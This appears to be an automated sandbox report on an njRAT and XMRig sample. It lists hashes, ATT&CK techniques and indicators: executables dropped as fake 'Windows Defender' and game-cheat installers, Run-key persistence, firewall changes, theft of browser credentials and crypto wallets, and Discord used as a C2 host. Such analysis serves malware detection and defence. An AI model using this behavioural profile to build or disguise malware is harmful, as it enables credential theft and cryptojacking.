njrat | 461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c

Analysis

max time kernel
149s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
05-02-2025 19:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
Size

57.6MB
MD5

0956d30facdbb958dabe6d13e751976f
SHA1

80cd8d27d451f221c58541a68566d49463d97aeb
SHA256

461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c
SHA512

c0457356da8ea38a4b7445b79e8d7bd95b76fbdfd6707b84df2bd0f8cf62f65316b7bc6c34c4c2044f35a7cb6bf937c9efcb73760581e5514e6cb1776f17a463
SSDEEP

1572864:Lf3VbWblqQ2LTbGk2kR0zvpspjSG/kt7Rb2n6CL0d:r3VLHbGkjRM+SGx6Uo

Score

10^/10

njrat xmrig collection credential_access defense_evasion discovery execution miner persistence privilege_escalation spyware stealer trojan upx

Malware Config

Signatures

Njrat family
njrat
Xmrig family
xmrig
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/memory/2920-114-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2920-113-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2920-117-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2920-119-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2920-120-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2920-118-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2920-116-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1748-756-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1748-758-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1748-776-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1748-777-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1748-775-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1748-774-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1748-773-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3428	powershell.exe
1716	powershell.exe
2460	powershell.exe
4016	powershell.exe
2992	powershell.exe
936	powershell.exe
4288	powershell.exe
3632	powershell.exe
2236	powershell.exe
3632	powershell.exe
4192	powershell.exe
4760	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 1 IoCs

flow	pid	Process
80	4768	CheatEngine75.tmp

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4788	netsh.exe
5008	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Control Panel\International\Geo\Nation	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
Key value queried	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Control Panel\International\Geo\Nation	Server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Control Panel\International\Geo\Nation	Rename_Z60IHLDjO6.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1088	cmd.exe
692	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aa63d8c3a8435a58d0b9f32e46b3a601.exe	Windows Defender.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aa63d8c3a8435a58d0b9f32e46b3a601.exe	Windows Defender.exe

Executes dropped EXE 15 IoCs

pid	Process
2916	Server.exe
5056	Windows Defender.exe
2556	build.exe
396	dlpwxhhxvcgc.exe
3968	FiveM.exe
3600	Rename_Z60IHLDjO6.exe
4308	python-installer.exe
3732	python-installer.exe
4808	FiveM Hack.exe
1836	FiveM Hack.exe
4188	services64.exe
4864	rar.exe
1008	sihost64.exe
3732	CheatEngine75.exe
4768	CheatEngine75.tmp

Loads dropped DLL 23 IoCs

pid	Process
3600	Rename_Z60IHLDjO6.exe
3732	python-installer.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
1836	FiveM Hack.exe
4768	CheatEngine75.tmp
4768	CheatEngine75.tmp
4768	CheatEngine75.tmp

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aa63d8c3a8435a58d0b9f32e46b3a601 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .."	Windows Defender.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\aa63d8c3a8435a58d0b9f32e46b3a601 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .."	Windows Defender.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rename_Z60IHLDjO6 = "C:\\ProgramData\\Update.vbs"	reg.exe

Checks for any installed AV software in registry 1 TTPs 9 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast	CheatEngine75.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
48	discord.com
51	discord.com
72	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
70	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
548	cmd.exe
4816	cmd.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\pRkz97p9tS.txt	Rename_Z60IHLDjO6.exe
File opened for modification	C:\Windows\System32\pRkz97p9tS.txt	Rename_Z60IHLDjO6.exe
File opened for modification	C:\Windows\system32\MRT.exe	build.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	dlpwxhhxvcgc.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2224	tasklist.exe
1088	tasklist.exe
4860	tasklist.exe
1952	tasklist.exe
4780	tasklist.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 396 set thread context of 1712	396	dlpwxhhxvcgc.exe	119
PID 396 set thread context of 2920	396	dlpwxhhxvcgc.exe	121
PID 3916 set thread context of 1748	3916	conhost.exe	256

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2920-108-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-114-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-112-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-111-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-113-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-110-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-109-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-117-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-119-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-120-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-118-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2920-116-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/files/0x0007000000023c8a-540.dat	upx
behavioral2/memory/1836-544-0x00007FFD4EC50000-0x00007FFD4F238000-memory.dmp	upx
behavioral2/files/0x0009000000023bf5-550.dat	upx
behavioral2/memory/1836-551-0x00007FFD5DE70000-0x00007FFD5DE94000-memory.dmp	upx
behavioral2/files/0x0007000000023c88-552.dat	upx
behavioral2/memory/1836-570-0x00007FFD67760000-0x00007FFD6776F000-memory.dmp	upx
behavioral2/memory/1836-575-0x00007FFD50A60000-0x00007FFD50A8D000-memory.dmp	upx
behavioral2/memory/1836-576-0x00007FFD5F3D0000-0x00007FFD5F3E9000-memory.dmp	upx
behavioral2/memory/1836-577-0x00007FFD500D0000-0x00007FFD500F3000-memory.dmp	upx
behavioral2/memory/1836-578-0x00007FFD4FDD0000-0x00007FFD4FF43000-memory.dmp	upx
behavioral2/memory/1836-579-0x00007FFD5E200000-0x00007FFD5E219000-memory.dmp	upx
behavioral2/memory/1836-582-0x00007FFD4FD10000-0x00007FFD4FDC8000-memory.dmp	upx
behavioral2/memory/1836-581-0x00007FFD5F5F0000-0x00007FFD5F5FD000-memory.dmp	upx
behavioral2/memory/1836-580-0x00007FFD4EC50000-0x00007FFD4F238000-memory.dmp	upx
behavioral2/memory/1836-585-0x00007FFD500A0000-0x00007FFD500CE000-memory.dmp	upx
behavioral2/memory/1836-583-0x00007FFD4E8D0000-0x00007FFD4EC45000-memory.dmp	upx
behavioral2/memory/1836-586-0x00007FFD5BE60000-0x00007FFD5BE74000-memory.dmp	upx
behavioral2/memory/1836-588-0x00007FFD5F3A0000-0x00007FFD5F3AD000-memory.dmp	upx
behavioral2/memory/1836-589-0x00007FFD4F3E0000-0x00007FFD4F4FC000-memory.dmp	upx
behavioral2/memory/1836-587-0x00007FFD5DE70000-0x00007FFD5DE94000-memory.dmp	upx
behavioral2/memory/1836-617-0x00007FFD50A60000-0x00007FFD50A8D000-memory.dmp	upx
behavioral2/memory/1836-671-0x00007FFD5F3D0000-0x00007FFD5F3E9000-memory.dmp	upx
behavioral2/memory/1836-672-0x00007FFD500D0000-0x00007FFD500F3000-memory.dmp	upx
behavioral2/memory/1836-673-0x00007FFD4EC50000-0x00007FFD4F238000-memory.dmp	upx
behavioral2/memory/1836-687-0x00007FFD4F3E0000-0x00007FFD4F4FC000-memory.dmp	upx
behavioral2/memory/1836-688-0x00007FFD4FDD0000-0x00007FFD4FF43000-memory.dmp	upx
behavioral2/memory/1836-684-0x00007FFD4E8D0000-0x00007FFD4EC45000-memory.dmp	upx
behavioral2/memory/1836-683-0x00007FFD4FD10000-0x00007FFD4FDC8000-memory.dmp	upx
behavioral2/memory/1836-682-0x00007FFD500A0000-0x00007FFD500CE000-memory.dmp	upx
behavioral2/memory/1836-680-0x00007FFD5E200000-0x00007FFD5E219000-memory.dmp	upx
behavioral2/memory/1836-674-0x00007FFD5DE70000-0x00007FFD5DE94000-memory.dmp	upx
behavioral2/memory/1836-723-0x00007FFD4EC50000-0x00007FFD4F238000-memory.dmp	upx
behavioral2/memory/1836-743-0x00007FFD500D0000-0x00007FFD500F3000-memory.dmp	upx
behavioral2/memory/1836-748-0x00007FFD4E8D0000-0x00007FFD4EC45000-memory.dmp	upx
behavioral2/memory/1836-747-0x00007FFD4FD10000-0x00007FFD4FDC8000-memory.dmp	upx
behavioral2/memory/1836-746-0x00007FFD5F5F0000-0x00007FFD5F5FD000-memory.dmp	upx
behavioral2/memory/1836-745-0x00007FFD5E200000-0x00007FFD5E219000-memory.dmp	upx
behavioral2/memory/1836-744-0x00007FFD4FDD0000-0x00007FFD4FF43000-memory.dmp	upx
behavioral2/memory/1836-742-0x00007FFD5F3D0000-0x00007FFD5F3E9000-memory.dmp	upx
behavioral2/memory/1836-741-0x00007FFD50A60000-0x00007FFD50A8D000-memory.dmp	upx
behavioral2/memory/1836-740-0x00007FFD67760000-0x00007FFD6776F000-memory.dmp	upx
behavioral2/memory/1836-739-0x00007FFD5DE70000-0x00007FFD5DE94000-memory.dmp	upx
behavioral2/memory/1836-738-0x00007FFD500A0000-0x00007FFD500CE000-memory.dmp	upx
behavioral2/memory/1836-737-0x00007FFD4F3E0000-0x00007FFD4F4FC000-memory.dmp	upx
behavioral2/memory/1836-736-0x00007FFD5F3A0000-0x00007FFD5F3AD000-memory.dmp	upx
behavioral2/memory/1836-735-0x00007FFD5BE60000-0x00007FFD5BE74000-memory.dmp	upx

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2760	sc.exe
3000	sc.exe
4804	sc.exe
840	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Defender.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4992	cmd.exe
2584	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CheatEngine75.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\	CheatEngine75.tmp

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2604	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5040	systeminfo.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2584	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
396	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	79	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2556	build.exe
936	powershell.exe
936	powershell.exe
2556	build.exe
2556	build.exe
2556	build.exe
2556	build.exe
2556	build.exe
396	dlpwxhhxvcgc.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
396	dlpwxhhxvcgc.exe
396	dlpwxhhxvcgc.exe
396	dlpwxhhxvcgc.exe
4892	conhost.exe
4892	conhost.exe
4288	powershell.exe
4288	powershell.exe
4288	powershell.exe
3428	powershell.exe
3428	powershell.exe
4192	powershell.exe
4192	powershell.exe
4192	powershell.exe
3428	powershell.exe
3260	powershell.exe
3260	powershell.exe
3260	powershell.exe
2016	powershell.exe
2016	powershell.exe
2016	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
4016	powershell.exe
4016	powershell.exe
4016	powershell.exe
4760	powershell.exe
4760	powershell.exe
2460	powershell.exe
2460	powershell.exe
4760	powershell.exe
2460	powershell.exe
692	powershell.exe
692	powershell.exe
4428	powershell.exe
4428	powershell.exe
692	powershell.exe
4428	powershell.exe
1716	powershell.exe
1716	powershell.exe
1716	powershell.exe
964	powershell.exe
964	powershell.exe
964	powershell.exe
3916	conhost.exe
3916	conhost.exe
2992	powershell.exe
2992	powershell.exe
2992	powershell.exe
1748	svchost.exe
1748	svchost.exe
2236	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5056	Windows Defender.exe
Token: 33	5056	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	5056	Windows Defender.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: 33	5056	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	5056	Windows Defender.exe
Token: SeLockMemoryPrivilege	2920	svchost.exe
Token: 33	5056	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	5056	Windows Defender.exe
Token: SeDebugPrivilege	4892	conhost.exe
Token: SeDebugPrivilege	4288	powershell.exe
Token: SeDebugPrivilege	3428	powershell.exe
Token: SeDebugPrivilege	4192	powershell.exe
Token: SeDebugPrivilege	1088	tasklist.exe
Token: 33	5056	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	5056	Windows Defender.exe
Token: SeDebugPrivilege	4860	tasklist.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeIncreaseQuotaPrivilege	380	WMIC.exe
Token: SeSecurityPrivilege	380	WMIC.exe
Token: SeTakeOwnershipPrivilege	380	WMIC.exe
Token: SeLoadDriverPrivilege	380	WMIC.exe
Token: SeSystemProfilePrivilege	380	WMIC.exe
Token: SeSystemtimePrivilege	380	WMIC.exe
Token: SeProfSingleProcessPrivilege	380	WMIC.exe
Token: SeIncBasePriorityPrivilege	380	WMIC.exe
Token: SeCreatePagefilePrivilege	380	WMIC.exe
Token: SeBackupPrivilege	380	WMIC.exe
Token: SeRestorePrivilege	380	WMIC.exe
Token: SeShutdownPrivilege	380	WMIC.exe
Token: SeDebugPrivilege	380	WMIC.exe
Token: SeSystemEnvironmentPrivilege	380	WMIC.exe
Token: SeRemoteShutdownPrivilege	380	WMIC.exe
Token: SeUndockPrivilege	380	WMIC.exe
Token: SeManageVolumePrivilege	380	WMIC.exe
Token: 33	380	WMIC.exe
Token: 34	380	WMIC.exe
Token: 35	380	WMIC.exe
Token: 36	380	WMIC.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeIncreaseQuotaPrivilege	380	WMIC.exe
Token: SeSecurityPrivilege	380	WMIC.exe
Token: SeTakeOwnershipPrivilege	380	WMIC.exe
Token: SeLoadDriverPrivilege	380	WMIC.exe
Token: SeSystemProfilePrivilege	380	WMIC.exe
Token: SeSystemtimePrivilege	380	WMIC.exe
Token: SeProfSingleProcessPrivilege	380	WMIC.exe
Token: SeIncBasePriorityPrivilege	380	WMIC.exe
Token: SeCreatePagefilePrivilege	380	WMIC.exe
Token: SeBackupPrivilege	380	WMIC.exe
Token: SeRestorePrivilege	380	WMIC.exe
Token: SeShutdownPrivilege	380	WMIC.exe
Token: SeDebugPrivilege	380	WMIC.exe
Token: SeSystemEnvironmentPrivilege	380	WMIC.exe
Token: SeRemoteShutdownPrivilege	380	WMIC.exe
Token: SeUndockPrivilege	380	WMIC.exe
Token: SeManageVolumePrivilege	380	WMIC.exe
Token: 33	380	WMIC.exe
Token: 34	380	WMIC.exe
Token: 35	380	WMIC.exe
Token: 36	380	WMIC.exe
Token: SeDebugPrivilege	4016	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4768	CheatEngine75.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1556 wrote to memory of 2916	1556	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe	87
